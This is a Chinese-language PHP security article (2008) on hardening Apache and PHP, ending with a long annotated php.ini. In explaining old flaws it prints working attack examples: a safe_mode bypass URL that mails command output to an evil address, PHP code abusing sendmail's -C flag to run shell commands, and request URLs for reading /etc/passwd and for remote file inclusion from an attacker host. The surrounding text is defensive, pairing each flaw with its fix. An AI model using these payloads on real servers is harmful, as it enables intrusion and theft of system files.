php 安全

2008-12-22 08:10:34  編輯來源:互聯網  简体版  手機版  評論  字體: 小|中|大

 

 

　　一、Web服務器安全

　　PHP其實不過是Web服務器的一個模塊功能，所以首先要保證Web服務器的安全。當然Web服務器要安全又必須是先保證系統安全，這樣就扯遠了，無窮無盡。PHP可以和各種Web服務器結合，這裏也只討論Apache。非常建議以chroot方式安裝啓動Apache，這樣即使Apache和PHP及其腳本出現漏洞，受影響的也只有這個禁锢的系統，不會危害實際系統。但是使用chroot的Apache後，給應用也會帶來一定的麻煩，比如連接mysql時必須用127.0.0.1地址使用tcp連接而不能用localhost實現socket連接，這在效率上會稍微差一點。還有mail函數發送郵件也是個問題，因爲php.ini裏的：

　　[mail function]

　　; For Win32 only.

　　SMTP = localhost

　　; For Win32 only.

　　sendmail_from =me@localhost.com

　　都是針對Win32平台，所以需要在chroot環境下調整好sendmail。

　　二、PHP本身問題 網管u家u.bitscn@com

　　1、遠程溢出

　　PHP-4.1.2以下的所有版本都存在文件上傳遠程緩沖區溢出漏洞，而且攻擊程序已經廣泛流傳，成功率非常高.

　　2、遠程拒絕服務

　　PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST請求處理遠程漏洞，雖然不能獲得本地用戶權限，但是也能造成拒絕服務。

　　3、safe_mode繞過漏洞

　　還有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函數繞過safe_mode限制執行命令漏洞，4.0.5版本開始mail函數增加了第五個參數，由于設計者考慮不周可以突破safe_mode的限制執行命令。其中4.0.5版本突破非常簡單，只需用分號隔開後面加shell命令就可以了，比如存在PHP腳本evil.php：

　　執行如下的URL：

http://foo.com/evil.php?bar=;/usr/bin/idmailevil@domain.com

　　這將id執行的結果發送給evil@domain.com。

　　對于4.0.6至4.2.2的PHP突破safe_mode限制其實是利用了sendmail的-C參數，所以系統必須是使用sendmail。如下的代碼能夠突破safe_mode限制執行命令：

　　#注意，下面這兩個必須是不存在的，

　　或者它們的屬主和本腳本的屬主是一樣

　　$script="/tmp/script123";

　　$cf="/tmp/cf123";

　　$fd = fopen($cf, "w");

　　fwrite($fd, "OQ/tmp

　　Sparse=0

　　R$*" . chr(9) . "$#local $@ $:

　　Mlocal, P=/bin/sh, A=sh $script");

　　fclose($fd);

　　$fd = fopen($script, "w");

　　fwrite($fd, "rm -f $script $cf; ");

　　fwrite($fd, $cmd);

　　fclose($fd);

　　mail("nobody", "", "", "", "-C$cf");

　　?>

　　還是使用以上有問題版本PHP的用戶一定要及時升級到最新版本，這樣才能消除基本的安全問題。

　　三、PHP本身的安全配置

　　PHP的配置非常靈活，可以通過php.ini, httpd.conf, .htaccess文件（該目錄必須設置了AllowOverride All或Options）進行設置，還可以在腳本程序裏使用ini_set()及其他的特定的函數進行設置。通過phpinfo()和get_cfg_var()函數可以得到配置選項的各個值。

　　如果配置選項是唯一PHP_INI_SYSTEM屬性的，必須通過php.ini和httpd.conf來修改，它們修改的是PHP的Master值，但修改之後必須重啓apache才能生效。其中php.ini設置的選項是對Web服務器所有腳本生效，httpd.conf裏設置的選項是對該定義的目錄下所有腳本生效。

　　如果還有其他的PHP_INI_USER, PHP_INI_PERDIR, PHP_INI_ALL屬性的選項就可以使用.htaccess文件設置，也可以通過在腳本程序自身用ini_set()函數設定，它們修改的是Local值，改了以後馬上生效。但是.htaccess只對當前目錄的腳本程序生效，ini_set()函數只對該腳本程序設置ini_set()函數以後的代碼生效。各個版本的選項屬性可能不盡相同，可以用如下命令查找當前源代碼的main.c文件得到所有的選項，以及它的屬性：

　　# grep PHP_INI_ /PHP_SRC/main/main.c

　　在討論PHP安全配置之前，應該好好了解PHP的safe_mode模式。

　　1、safe_mode

　　safe_mode是唯一PHP_INI_SYSTEM屬性，必須通過php.ini或httpd.conf來設置。要啓用safe_mode，只需修改php.ini：

　　safe_mode = On

　　或者修改httpd.conf，定義目錄：

　　Options FollowSymLinks

　　php_admin_value safe_mode 1

　　重啓apache後safe_mode就生效了。啓動safe_mode，會對許多PHP函數進行限制，特別是和系統相關的文件打開、命令執行等函數。

　　所有操作文件的函數將只能操作與腳本UID相同的文件，比如test.php腳本的內容爲：

　　幾個文件的屬性如下：

　　# ls -la

　　total 13

　　drwxr-xr-x 2 root root 104 Jul 20 01:25 .

　　drwxr-xr-x 16 root root 384 Jul 18 12:02 ..

　　-rw-r--r-- 1 root root 4110 Oct 26 2002 index.html

　　-rw-r--r-- 1 www-data www-data 41 Jul 19 19:14 test.php

　　在浏覽器請求test.php會提示如下的錯誤信息：

　　Warning: SAFE MODE Restriction in effect. The script whose uid/gid is 33/33 is not allowed to access ./index.html owned by uid/gid 0/0 in /var/www/test.php on line 1

　　如果被操作文件所在目錄的UID和腳本UID一致，那麽該文件的UID即使和腳本不同也可以訪問的，不知這是否是PHP的一個漏洞還是另有隱情。所以php腳本屬主這個用戶最好就只作這個用途，絕對禁止使用root做爲php腳本的屬主，這樣就達不到safe_mode的效果了。

　　如果想將其放寬到GID比較，則打開 safe_mode_gid可以考慮只比較文件的GID，可以設置如下選項：

　　safe_mode_gid = On

　　設置了safe_mode以後，所有命令執行的函數將被限制只能執行php.ini裏safe_mode_exec_dir指定目錄裏的程序，而且shell_exec、`ls -l`這種執行命令的方式會被禁止。如果確實需要調用其它程序，可以在php.ini做如下設置：

　　safe_mode_exec_dir = /usr/local/php/exec

　　然後拷貝程序到該目錄，那麽php腳本就可以用system等函數來執行該程序。而且該目錄裏的shell腳本還是可以調用其它目錄裏的系統命令。

　　safe_mode_include_dir string

　　當從此目錄及其子目錄（目錄必須在 include_path 中或者用完整路徑來包含）包含文件時越過 UID/GID 檢查。

　　從 PHP 4.2.0 開始，本指令可以接受和 include_path 指令類似的風格用分號隔開的路徑，而不只是一個目錄。

　　指定的限制實際上是一個前綴，而非一個目錄名。這也就是說「safe_mode_include_dir = /dir/incl」將允許訪問「/dir/include」和「/dir/incls」，如果它們存在。如果您希望將訪問控制在一個指定的目錄，那麽請在結尾加上一個斜線，例如：「safe_mode_include_dir = /dir/incl/」。

　　safe_mode_allowed_env_vars string

　　設置某些環境變量可能是潛在的安全缺口。本指令包含有一個逗號分隔的前綴列表。在安全模式下，用戶只能改變那些名字具有在這裏提供的前綴的環境變量。默認情況下，用戶只能設置以 PHP_ 開頭的環境變量（例如 PHP_FOO = BAR）。

　　注: 如果本指令爲空，PHP 將使用戶可以修改任何環境變量！

　　safe_mode_protected_env_vars string

　　本指令包含有一個逗號分隔的環境變量的列表，最終用戶不能用 putenv() 來改變這些環境變量。甚至在 safe_mode_allowed_env_vars 中設置了允許修改時也不能改變這些變量。

　　雖然safe_mode不是萬能的（低版本的PHP可以繞過），但還是強烈建議打開安全模式，在一定程度上能夠避免一些未知的攻擊。不過啓用safe_mode會有很多限制，可能對應用帶來影響，所以還需要調整代碼和配置才能和諧。被安全模式限制或屏蔽的函數可以參考PHP手冊。

　　討論完safe_mode後，下面結合程序代碼實際可能出現的問題討論如何通過對PHP服務器端的配置來避免出現的漏洞。

　　2、變量濫用

　　PHP默認register_globals = On，對于GET, POST, Cookie, Environment, Session的變量可以直接注冊成全局變量。它們的注冊順序是variables_order = "EGPCS"（可以通過php.ini修改），同名變量variables_order右邊的覆蓋左邊，所以變量的濫用極易造成程序的混亂。而且腳本程序員往往沒有對變量初始化的習慣，像如下的程序片斷就極易受到攻擊：

　　//test_1.php

　　if ($pass == "hello")

　　$auth = 1;

　　if ($auth == 1)

　　echo "some important information";

　　else

　　echo "nothing";

　　?>

　　攻擊者只需用如下的請求就能繞過檢查：

http://victim/test_1.php?auth=1

　　這雖然是一個很弱智的錯誤，但一些著名的程序也有犯過這種錯誤，比如phpnuke的遠程文件拷貝漏洞：http://www.securityfocus.com/bid/3361

　　PHP-4.1.0發布的時候建議關閉register_globals，並提供了7個特殊的數組變量來使用各種變量。對于從GET、POST、COOKIE等來的變量並不會直接注冊成變量，必需通過數組變量來存取。PHP-4.2.0發布的時候，php.ini默認配置就是register_globals = Off。這使得程序使用PHP自身初始化的默認值，一般爲0，避免了攻擊者控制判斷變量。

　　解決方法：

　　配置文件php.ini設置register_globals = Off。

　　要求程序員對作爲判斷的變量在程序最開始初始化一個值。

　　3、文件打開

　　極易受攻擊的代碼片斷：

　　//test_2.php

　　if (!($str = readfile("$filename"))) {

　　echo("Could not open file: $filename

　　\n");

　　exit;

　　}

　　else {

　　echo $str;

　　}

　　?>

　　由于攻擊者可以指定任意的$filename，攻擊者用如下的請求就可以看到/etc/passwd：

http://victim/test_2.php?filename=/etc/passwd

　　如下請求可以讀php文件本身：

http://victim/test_2.php?filename=test_2.php

　　PHP中文件打開函數還有fopen(), file()等，如果對文件名變量檢查不嚴就會造成服務器重要文件被訪問讀取。

　　解決方法：

　　如非特殊需要，把php的文件操作限制在web目錄裏面。以下是修改apache配置文件httpd.conf的一個例子：

　　php_admin_value open_basedir /usr/local/apache/htdocs

　　重啓apache後，/usr/local/apache/htdocs目錄下的PHP腳本就只能操作它自己目錄下的文件了，否則PHP就會報錯：

　　Warning: open_basedir restriction in effect.

　　File is in wrong directory in xxx on line xx.

　　使用safe_mode模式也能避免這種問題，前面已經討論過了。

　　4、包含文件

　　極易受攻擊的代碼片斷：

　　//test_3.php

　　if(file_exists($filename))

　　include("$filename");

　　?>

　　這種不負責任的代碼會造成相當大的危害，攻擊者用如下請求可以得到/etc/passwd文件：

http://victim/test_3.php?filename=/etc/passwd

　　如果對于Unix版的PHP（Win版的PHP不支持遠程打開文件）攻擊者可以在自己開了http或ftp服務的機器上建立一個包含shell命令的文件，如http://attack/attack.txt的內容是，那麽如下的請求就可以在目標主機執行命令ls /etc：

http://victim/test_3.php?filename=http://attack/attack.txt

　　攻擊者甚至可以通過包含apache的日志文件access.log和error.log來得到執行命令的代碼，不過由于幹擾信息太多，有時不易成功。

　　對于另外一種形式，如下代碼片斷：

　　//test_4.php

　　include("$lib/config.php");

　　?>

　　攻擊者可以在自己的主機建立一個包含執行命令代碼的config.php文件，然後用如下請求也可以在目標主機執行命令：

http://victim/test_4.php?lib=http://attack

　　PHP的包含函數有include(), include_once(), require(), require_once。如果對包含文件名變量檢查不嚴就會對系統造成嚴重危險，可以遠程執行命令。

　　解決方法：

　　要求程序員包含文件裏的參數盡量不要使用變量，如果使用變量，就一定要嚴格檢查要包含的文件名，絕對不能由用戶任意指定。

　　如前面文件打開中限制PHP操作路徑是一個必要的選項。另外，如非特殊需要，一定要關閉PHP的遠程文件打開功能。修改php.ini文件：

　　allow_url_fopen = Off

　　重啓apache

　　[PHP]

　　; PHP還是一個不斷發展的工具，其功能還在不斷地刪減

　　; 而php.ini的設置更改可以反映出相當的變化，

　　; 在使用新的PHP版本前，研究一下php.ini會有好處的

　　;;;;;;;;;;;;;;;;;;;

　　; 關于這個文件 ;

　　;;;;;;;;;;;;;;;;;;;

　　; 這個文件控制了PHP許多方面的觀點.爲了讓PHP讀取這個文件，它必須被命名爲

　　; 'php.ini'.PHP 將在這些地方依次查找該文件：當前工作目錄；環境變量PHPRC

　　; 指明的路徑；編譯時指定的路徑.

　　; 在windows下，編譯時的路徑是Windows安裝目錄.

　　; 在命令行模式下，php.ini的查找路徑可以用 -c 參數替代.

　　; 該文件的語法非常簡單.空白字符和用分號';'開始的行被簡單地忽略（就象你可能

　　; 猜到的一樣）. 章節標題（例如 : [Foo]）也被簡單地忽略，即使將來它們可能

　　; 有某種的意義.

　　;

　　; 指示被指定使用如下語法：

　　; 指示標識符 = 值

　　; directive = value

　　; 指示標識符 是 *大小寫敏感的* - foo=bar 不同于 FOO = bar.

　　;

　　; 值可以是一個字符串，一個數字，一個 PHP 常量 (如： E_ALL or M_PI), INI 常量中的

　　; 一個 (On, Off, True, False, Yes, No and None) ，或是一個表達式

　　; (如: E_ALL & ~E_NOTICE), 或是用引號括起來的字符串("foo").

　　;

　　; INI 文件的表達式被限制于位運算符和括號.

　　; | bitwise OR

　　; & bitwise AND

　　; ~ bitwise NOT

　　; ! boolean NOT

　　;

　　; 布爾標志可用 1, On, True or Yes 這些值置于開的狀態.

　　; 它們可用 0, Off, False or No 這些值置于關的狀態.

　　;

　　; 一個空字符串可以用在等號後不寫任何東西表示，或者用 None 關鍵字:

　　;

　　; foo = ; 將foo置爲空字符串

　　; foo = none ; 將foo置爲空字符串

　　; foo = "none" ; 將foo置爲字符串'none'

　　;

　　; 如果你值設置中使用常量，而這些常量屬于動態調入的擴展庫（不是 PHP 的擴展，就是

　　; Zend 的擴展），你僅可以調入這些擴展的行*之後*使用這些常量.

　　;

　　; 所有在 php.ini-dist 文件裏設定的值與內建的默認值相同（這是說，如果 php.ini

　　; 沒被使用或者你刪掉了這些行，默認值與之相同）.

　　;;;;;;;;;;;;;;;;;;;;

　　; 語言選項 ;

　　;;;;;;;;;;;;;;;;;;;;

　　engine = On

　　; 使 PHP scripting language engine（PHP 腳本語言引擎）在 Apache下有效.

　　short_open_tag = On

　　; 允許 <? 標識（這種簡單表示）. 僅有 <?php and <script> tags 將被識別.

　　asp_tags = Off

　　; 允許ASP-style <% %> tags

　　precision = 14

　　; 浮點類型數顯示時的有效位數

　　y2k_compliance = Off

　　; 是否打開 2000年適應 (可能在非Y2K適應的浏覽器中導致問題)

　　output_buffering = Off

　　; 輸出緩存允許你甚至在輸出正文內容之後發送 header（標頭，包括cookies）行

　　; 其代價是輸出層減慢一點點速度.你可以使用輸出緩存在運行時打開輸出緩存，

　　; 或者在這裏將指示設爲 On 而使得所有文件的輸出緩存打開.

　　output_handler = ; 你可以重定向你的腳本的所有輸出到一個函數，

　　; 那樣做可能對處理或以日志記錄它有用.

　　; 例如若你將這個output_handler 設爲"ob_gzhandler",

　　; 則輸出會被透明地爲支持gzip或deflate編碼的浏覽器壓縮.

　　; 設一個輸出處理器自動地打開輸出緩沖.

　　implicit_flush = Off

　　; 強制flush（刷新）讓PHP 告訴輸出層在每個輸出塊之後自動刷新自身數據.

　　; 這等效于在每個 print() 或 echo() 調用和每個 HTML 塊後調用flush()函數.

　　; 打開這項設置會導致嚴重的運行時沖突，建議僅在debug過程中打開.

　　allow_call_time_pass_reference = On

　　; 是否讓強迫函數調用時按引用傳遞參數.這一方法遭到抗議，

　　; 並可能在將來版本的PHP/Zend裏不再支持.

　　; 受到鼓勵的指定哪些參數按引用傳遞的方法是在函數聲明裏.

　　; 你被鼓勵嘗試關閉這一選項並確認你的腳本仍能正常工作，以保證在將來版本的語言裏

　　; 它們仍能工作.（你將在每次使用該特點時得到一個警告，而參數將按值而不是按引用

　　; 傳遞）.

　　; Safe Mode 安全模式

　　safe_mode = Off

　　safe_mode_exec_dir =

　　safe_mode_allowed_env_vars = PHP_

　　; ？Setting certain environment variables

　　; ？may be a potential security breach.

　　; 該指示包含用逗號分隔的前綴列表.安全模式中，用戶僅可以替換

　　; 以在此列出的前綴開頭的環境變量的值.

　　; 默認地，用戶將僅能 設定以PHP_開頭的環境變量，（如: PHP_FOO=BAR）.

　　; 注意: 如果這一指示爲空，PHP 將讓用戶更改任意環境變量!

　　safe_mode_protected_env_vars = LD_LIBRARY_PATH

　　; 這條指示包含一個用逗號分隔的環境變量列表，那是最終用戶將不能用putenv () 更改的.

　　; 這些變量甚至在safe_mode_allowed_env_vars 設置爲允許的情況下得到保護.

　　disable_functions =

　　; 這條指示讓你可以爲了安全的原因讓特定函數失效.

　　; 它接受一個用逗號分隔的函數名列表.

　　; 這條指示 *不受* 安全模式是否打開的影響.

　　; 語法高亮模式的色彩.

　　; 只要能被<font color=???>接受的東西就能工作.

　　highlight.string = #DD0000

　　highlight.comment = #FF8000

　　highlight.keyword = #007700

　　highlight.bg = #FFFFFF

　　highlight.default = #0000BB

　　highlight.html = #000000

　　; Misc 雜項

　　expose_php = Off

　　; 決定 PHP 是否標示它裝在服務器上的事實（例如：加在它 —PHP—給Web服務

　　; 發送的信號上）.

　　; （我個人的意見，在出現什麽power-by的header的時候，把這關掉.）

　　; 它不會有安全上的威脅, 但它使檢查你的服務器上是否安裝了PHP成爲了可能.

　　;;;;;;;;;;;;;;;;;;;

　　; Resource Limits ;

　　;;;;;;;;;;;;;;;;;;;

　　max_execution_time = 30 ; 每個腳本的最大執行時間, 按秒計

　　memory_limit = 8388608 ; 一個腳本最大可使用的內存總量 (這裏是8MB)

　　;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

　　; Error handling and logging ;

　　; 出錯控制和登記 ;

　　;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

　　; 錯誤報告是按位的.或者將數字加起來得到想要的錯誤報告等級.

　　; E_ALL - 所有的錯誤和警告

　　; E_ERROR - 致命性運行時錯

　　; E_WARNING - 運行時警告（非致命性錯）

　　; E_PARSE - 編譯時解析錯誤

　　; E_NOTICE - 運行時提醒(這些經常是是你的代碼的bug引起的，

　　;也可能是有意的行爲造成的.(如：基于未初始化的變量自動初始化爲一個

　　;空字符串的事實而使用一個未初始化的變量)

　　; E_CORE_ERROR - 發生于PHP啓動時初始化過程中的致命錯誤

　　; E_CORE_WARNING - 發生于PHP啓動時初始化過程中的警告(非致命性錯)

　　; E_COMPILE_ERROR - 編譯時致命性錯

　　; E_COMPILE_WARNING - 編譯時警告(非致命性錯)

　　; E_USER_ERROR - 用戶産生的出錯消息

　　; E_USER_WARNING - 用戶産生的警告消息

　　; E_USER_NOTICE - 用戶産生的提醒消息

　　; 例子:

　　; error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒

　　; error_reporting = E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR ; 僅顯示錯誤

　　error_reporting = E_ALL & ~E_NOTICE ; 顯示所有的錯誤，除了提醒

　　display_errors = On ; 顯示出錯誤信息(作爲輸出的一部分)

　　; 在最終發布的web站點上，強烈建議你關掉這個特性，並使用

　　; 錯誤日志代替（參看下面）.

　　; 在最終發布的web站點繼續讓 display_errors 有效可能

　　; 暴露一些有關安全的信息，例如你的web服務上的文件路徑、

　　; 你的數據庫規劃或別的信息.

　　display_startup_errors = Off ; 甚至當display_erroes打開了，發生于PHP的啓動的步驟中

　　; 的錯誤也不會被顯示.

　　; 強烈建議保持使 display_startup_errors 關閉，

　　; 除了在改錯過程中.

　　log_errors = Off ; 在日志文件裏記錄錯誤（服務器指定的日志，stderr標准錯誤輸出，或error_log(下面的））

　　; 正如上面說明的那樣，強烈建議你在最終發布的web站點以日志記錄錯誤

　　; 取代直接錯誤輸出.

　　track_errors = Off ; 保存最近一個 錯誤/警告 消息于變量 $php_errormsg (boolean)

　　;error_prepend_string = "<font color=ff0000>" ; 于錯誤信息前輸出的字符串

　　;error_append_string = "</font>" ; 于錯誤信息後輸出的字符串

　　;error_log = filename ; 記錄錯誤日志于指定文件

　　;error_log = syslog ; 記錄錯誤日志于系統日志 syslog (NT 下的事件日志, Windows 95下無效)

　　warn_plus_overloading = Off ; 當將『+』用于字符串時警告

　　;;;;;;;;;;;;;;;;;

　　; Data Handling ;

　　;;;;;;;;;;;;;;;;;variables_order = "EGPCS" ; 這條指示描述了PHP 記錄

　　; GET, POST, Cookie, Environment and Built-in 這些變量的順序.

　　; （以 G, P, C, E & S 代表，通常以 EGPCS 或 GPC 的方式引用）.

　　; 按從左到右記錄，新值取代舊值.

　　register_globals = On ; 是否將這些 EGPCS 變量注冊爲全局變量.

　　; 若你不想讓用戶數據不在全局範圍內混亂的話，你可能想關閉它.

　　; 這和 track_vars 連起來用更有意義 — 這樣你可以通過

　　; $HTTP_*_VARS[] 數組訪問所有的GPC變量.

　　register_argc_argv = On ; 這條指示告訴 PHP 是否聲明 argv和argc 變量

　　; （注：這裏argv爲數組,argc爲變量數）

　　; （其中包含用GET方法傳來的數據）.

　　; 若你不想用這些變量，你應當關掉它以提高性能.

　　track_vars = On ; 使$HTTP_*_VARS[]數組有效，這裏*在使用時用

　　; ENV, POST, GET, COOKIE or SERVER替換

　　post_max_size = 8M ; PHP將接受的POST數據最大大小.

　　gpc_order = "GPC" ; 這條指示被人反對.用 variables_order 代替.

　　; Magic quotes

　　magic_quotes_gpc = On ; 在輸入的GET/POST/Cookie數據裏使用魔術引用

　　; （原文就這樣，呵呵，所謂magic quotes 應該是指用轉義符加在引用性的控制字符上，如 \'....）

　　magic_quotes_runtime= Off ; 對運行時産生的數據使用魔術引用，

　　; 例如：用SQL查詢得到的數據，用exec()函數得到的數據，等等

　　magic_quotes_sybase = Off ; 采用 Sybase形式的魔術引用（用 '' 脫出 ' 而不用 \'）

　　; 自動在 PHP 文檔之前和之後添加文件

　　auto_prepend_file =

　　auto_append_file =

　　; 象4.04b4一樣，PHP 默認地總是在 「Content-type:」 頭標輸出一個字符的編碼方式.

　　; 讓輸出字符集失效，只要設置爲空.

　　; PHP 的內建默認值是 text/html

　　default_mimetype = "text/html"

　　;default_charset = "iso-8859-1"

　　;;;;;;;;;;;;;;;;;;;;;;;;;

　　; Paths and Directories ;

　　;;;;;;;;;;;;;;;;;;;;;;;;;

　　include_path = ; include 路徑設置，UNIX: "/path1:/path2" Windows: "\path1;\path2"

　　doc_root = ; php 頁面的根路徑，僅在非空時有效

　　user_dir = ; 告知 php 在使用 /~username 打開腳本時到哪個目錄下去找，僅在非空時有效

　　;upload_tmp_dir = ; 存放用HTTP協議上載的文件的臨時目錄（在沒指定時使用系統默認的）

　　upload_max_filesize = 2097152 ; 文件上載默認地限制爲2 Meg

　　extension_dir = c:\php\ ; 存放可加載的擴充庫（模塊）的目錄

　　enable_dl = On ; 是否使dl()有效.

　　; 在多線程的服務器上 dl()函數*不能*很好地工作，

　　; 例如IIS or Zeus，並在其上默認爲禁止

　　;;;;;;;;;;;;;;;;

　　; File Uploads ;

　　;;;;;;;;;;;;;;;;

　　file_uploads = On ; 是否允許HTTP方式文件上載

　　;upload_tmp_dir = ; 用于HTTP上載的文件的臨時目錄（未指定則使用系統默認）

　　upload_max_filesize = 2M ; 上載文件的最大許可大小

　　; Fopen wrappers ;

　　;;;;;;;;;;;;;;;;;;

　　allow_url_fopen = On ; 是否允許把URLs當作http:.. 或把文件當作ftp:...

　　;;;;;;;;;;;;;;;;;;;;;;

　　; 動態擴展 ;

　　; Dynamic Extensions ;

　　;;;;;;;;;;;;;;;;;;;;;;

　　; 若你希望一個擴展庫自動加載，用下面的語法：

　　; extension=modulename.extension

　　; 例如，在windows上，

　　; extension=msql.dll

　　; or 在UNIX下,

　　; extension=msql.so

　　; 注意，這只應當是模塊的名字，不需要目錄信息放在裏面.

　　; 用上面的 extension_dir 指示指定擴展庫的位置.

　　;Windows 擴展

　　;extension=php_nsmail.dll

　　extension=php_calendar.dll

　　;extension=php_dbase.dll

　　;extension=php_filepro.dll

　　extension=php_gd.dll

　　;extension=php_dbm.dll

　　;extension=php_mssql.dll

　　;extension=php_zlib.dll

　　;extension=php_filepro.dll

　　;extension=php_imap4r2.dll

　　;extension=php_ldap.dll

　　;extension=php_crypt.dll

　　;extension=php_msql2.dll

　　;extension=php_odbc.dll

　　; 注意， MySQL的支持現在是內建的，因此，不需要用它的dll

　　;;;;;;;;;;;;;;;;;;;

　　; 模塊設定 ;

　　; Module Settings ;

　　;;;;;;;;;;;;;;;;;;;

　　[Syslog]

　　define_syslog_variables = Off ; 是否定義各種的系統日志變量

　　; 如：$LOG_PID, $LOG_CRON, 等等.

　　; 關掉它是個提高效率的好主意.

　　; 運行時，你可以調用函數define_syslog_variables()，來定義這些變量

　　[mail function]

　　SMTP = localhost ;僅用于win32系統

　　sendmail_from =me@localhost.com;僅用于win32系統

　　;sendmail_path = ;僅用于unix, 也可支持參數（默認的是'sendmail -t -i'）

　　[Debugger]

　　debugger.host = localhost

　　debugger.port = 7869

　　debugger.enabled = False

　　[Logging]

　　; 這些配置指示用于示例的日志記錄機制.

　　; 看 examples/README.logging 以得到更多的解釋

　　;logging.method = db

　　;logging.directory = /path/to/log/directory

　　[Java]

　　;java.class.path = .\php_java.jar

　　;java.home = c:\jdk

　　;java.library = c:\jdk\jre\bin\hotspot\jvm.dll

　　;java.library.path = .\

　　[SQL]

　　sql.safe_mode = Off

　　[ODBC]

　　;uodbc.default_db = Not yet implemented

　　;uodbc.default_user = Not yet implemented

　　;uodbc.default_pw = Not yet implemented

　　uodbc.allow_persistent = On ; 允許或禁止 持久連接

　　uodbc.check_persistent = On ; 在重用前檢查連接是否還可用

　　uodbc.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　uodbc.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制 網管u家u.bitsCN.com

　　uodbc.defaultlrl = 4096 ; 控制 LONG 類型的字段.返回變量的字節數，0 代表通過（？）0 means passthru

　　uodbc.defaultbinmode = 1 ; 控制 二進制數據.0 代表?????Handling of binary data. 0 means passthru, 1 return as is, 2 convert to char

　　; 見有關 odbc_binmode 和 odbc_longreadlen 的文檔以得到 uodbc.defaultlrl 和 uodbc.defaultbinmode 的解釋.

　　[MySQL]

　　mysql.allow_persistent = On ; 允許或禁止 持久連接

　　mysql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　mysql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　mysql.default_port = ; mysql_connect() 使用的默認端口，如不設置，mysql_connect()

　　; 將使用變量 $MYSQL_TCP_PORT，或在/etc/services 下的mysql-tcp 條目(unix)，

　　; 或在編譯是定義的 MYSQL_PORT(按這樣的順序)

　　; Win32環境，將僅檢查MYSQL_PORT.

　　mysql.default_socket = ; 用于本地 MySql 連接的默認的套接字名.爲空，使用 MYSQL 內建值

　　mysql.default_host = ; mysql_connect() 默認使用的主機（安全模式下無效）

　　mysql.default_user = ; mysql_connect() 默認使用的用戶名（安全模式下無效）

　　mysql.default_password = ; mysql_connect() 默認使用的密碼（安全模式下無效）

　　; 注意，在這個文件下保存密碼通常是一個*壞*主意

　　; *任何*可以使用PHP訪問的用戶可以運行

　　; 'echo cfg_get_var("mysql.default_password")'來顯示那個密碼!

　　; 而且當然地，任何有讀該文件權力的用戶也能看到那個密碼.

　　[mSQL]

　　msql.allow_persistent = On ; 允許或禁止 持久連接

　　msql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　msql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　[PostgresSQL]

　　pgsql.allow_persistent = On ; 允許或禁止 持久連接

　　pgsql.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　pgsql.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　[Sybase]

　　sybase.allow_persistent = On ; 允許或禁止 持久連接

　　sybase.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　sybase.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　;sybase.interface_file = "/usr/sybase/interfaces"

　　sybase.min_error_severity = 10 ; 顯示的錯誤的最低嚴重性

　　sybase.min_message_severity = 10 ; 顯示的消息的最低重要性

　　sybase.compatability_mode = Off ; 與舊版的PHP 3.0 兼容的模式.若打開，這將導致 PHP 自動地

　　; 把根據結果的 Sybase 類型賦予它們，

　　; 而不是把它們全當成字符串.

　　; 這個兼容模式不會永遠留著，

　　; 因此，將你的代碼進行需要的修改，

　　; 並將該項關閉.

　　[Sybase-CT]

　　sybct.allow_persistent = On ; 允許或禁止 持久連接

　　sybct.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　sybct.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　sybct.min_server_severity = 10 ; 顯示的錯誤的最低嚴重性

　　sybct.min_client_severity = 10 ; 顯示的消息的最低重要性

　　[bcmath]

　　bcmath.scale = 0 ; 用于所有bcmath函數的10十進制數數字的個數number of decimal digits for all bcmath functions

　　[browscap]

　　;browscap = extra/browscap.ini

　　browscap = C:\WIN\SYSTEM\inetsrv\browscap.ini

　　[Informix]

　　ifx.default_host = ; ifx_connect() 默認使用的主機（安全模式下無效）

　　ifx.default_user = ; ifx_connect() 默認使用的用戶名（安全模式下無效）

　　ifx.default_password = ; ifx_connect() 默認使用的密碼（安全模式下無效）

　　ifx.allow_persistent = On ; 允許或禁止 持久連接

　　ifx.max_persistent = -1 ; 持久連接的最大數.-1 代表無限制

　　ifx.max_links = -1 ; 連接的最大數目（持久和非持久）.-1 代表無限制

　　ifx.textasvarchar = 0 ; 若打開，select 狀態符返回一個 『text blob』字段的內容，而不是它的id

　　ifx.byteasvarchar = 0 ; 若打開，select 狀態符返回一個 『byte blob』字段的內容，而不是它的id

　　ifx.charasvarchar = 0 ; 追蹤從固定長度的字符列裏剝離的空格.

　　; 可能對 Informix SE 用戶有效.

　　ifx.blobinfile = 0 ; 若打開，text和byte blobs 的內容被導出到一個文件

　　; 而不是保存到內存.

　　ifx.nullformat = 0 ; NULL（空）被作爲空字段返回，除非，這裏被設爲1.

　　; 這種情況下（爲1），NULL作爲字串NULL返回.

　　[Session]

　　session.save_handler = files ; 用于保存/取回數據的控制方式

　　session.save_path = C:\win\temp ; 在 save_handler 設爲文件時傳給控制器的參數，

　　; 這是數據文件將保存的路徑.

　　session.use_cookies = 1 ; 是否使用cookies

　　session.name = PHPSESSID

　　; 用在cookie裏的session的名字

　　session.auto_start = 0 ; 在請求啓動時初始化session

　　session.cookie_lifetime = 0 ; 爲按秒記的cookie的保存時間，

　　; 或爲0時，直到浏覽器被重啓

　　session.cookie_path = / ; cookie的有效路徑

　　session.cookie_domain = ; cookie的有效域

　　session.serialize_handler = php ; 用于連接數據的控制器

　　; php是 PHP 的標准控制器.

　　session.gc_probability = 1 ; 按百分比的'garbage collection（碎片整理）'進程

　　; 在每次 session 初始化的時候開始的可能性. 網管bitscn_com

　　session.gc_maxlifetime = 1440 ; 在這裏數字所指的秒數後，保存的數據將被視爲

　　; '碎片(garbage)'並由gc 進程清理掉.

